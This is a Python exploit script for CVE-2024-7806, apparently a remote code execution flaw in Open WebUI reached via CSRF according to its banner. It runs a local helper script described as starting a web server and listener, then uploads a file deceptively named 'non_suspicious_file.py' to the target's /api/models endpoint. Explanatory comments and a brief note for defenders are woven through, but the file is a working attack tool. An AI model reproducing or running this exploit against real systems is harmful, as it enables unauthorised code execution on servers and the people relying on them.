CVE-2024-7806.py
import argparse
import sys
import subprocess
import requests
# ANSI SGR escape sequences used to colour terminal output. The names say
# "ascii", but these are ANSI control sequences introduced by ESC (0x1b).
ascii_green_color = "\x1b[32m"  # green foreground
ascii_red_color = "\x1b[1;31m"  # bold + red foreground
ascii_purple = "\x1b[35m"  # magenta foreground
ascii_reset = "\x1b[0m"  # clear all attributes
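def parse_arguments():
    """Parse the command line and continue only when a URL was supplied.

    Reads the ``-u/--url`` option. If it is missing or empty, the help text
    is printed and the process exits with status 1; otherwise the value is
    handed to ``exploit``.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", required=False, type=str, help="Target URL")
    url = parser.parse_args().url

    # A bare invocation (no arguments) must not fall through to exploit():
    # url would be None there, and the helper script would already have been
    # started before the request failed on the None value.
    if not url:
        parser.print_help()
        sys.exit(1)

    exploit(url)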
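def exploit(url):
    """Run the local helper script, then POST a local file to ``url``.

    Steps visible in this function:
      1. ``./serve.sh`` is executed through ``bash -c`` from the current
         working directory; its exit status is not inspected.
      2. ``non_suspicious_file.py`` is opened in binary mode and the handle
         is passed as ``files=`` to ``requests.post(url + "/api/models")``.
      3. Any status other than 200 is reported as a failure.

    Args:
        url: Base URL; the path ``/api/models`` is appended without
            normalisation.

    NOTE(review): the request built here sets no credentials, cookies or
    extra headers of its own. For defenders, the observable is a multipart
    POST to ``/api/models``; logging and alerting on writes to that path from
    unexpected origins, and applying the vendor fix for the CVE named in this
    file's name, are the relevant controls. What ``serve.sh`` does is not
    shown on this page.
    """
    # starting web server and listener in different tabs
    subprocess.run(["bash", "-c", "./serve.sh"])

    # uploading file; the context manager closes the handle, which was
    # previously left open for the life of the process
    with open("non_suspicious_file.py", "rb") as file:
        response = requests.post(url + "/api/models", files=file)

    if response.status_code != 200:
        # reset the colour so the failure message does not leave the
        # terminal red
        print(ascii_red_color + "Couldn't load file. " + ascii_reset)
    else:
        print(ascii_green_color + "File loaded successfully." + ascii_reset)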
def banner():
    """Print the ASCII-art banner in purple, then reset the terminal colour."""
    # Switch the terminal to the purple escape sequence before the art.
    print(ascii_purple)
    # The art is a plain (non-raw) triple-quoted string, so every doubled
    # backslash below is emitted as a single backslash.
    print('''
_ _ ____ ____ _____
___ _ __ ___ _ __ __ _____| |__ _ _(_) | _ \\ / ___| ____|
/ _ \\| '_ \\ / _ \\ '_ \\ ____\\ \\ /\\ / / _ \\ '_ \\| | | | | | |_) | | | _|
| (_) | |_) | __/ | | |_____\\ V V / __/ |_) | |_| | | | _ <| |___| |___
\\___/| .__/ \\___|_| |_| \\_/\\_/ \\___|_.__/ \\__,_|_| |_| \\_\\____|_____|
|_| ____ ____ ____ _____
__ _(_) __ _ / ___/ ___|| _ \\| ___|
\\ \\ / / |/ _` | | | \\___ \\| |_) | |_
\\ V /| | (_| | | |___ ___) | _ <| _|
\\_/ |_|\\__,_| \\____|____/|_| \\_\\_|
''')
    # Restore default attributes so later output is not coloured.
    print(ascii_reset)
# Script entry point: show the banner first, then let the CLI parser decide
# whether to continue or print usage.
if __name__ == "__main__":
    banner()
    parse_arguments()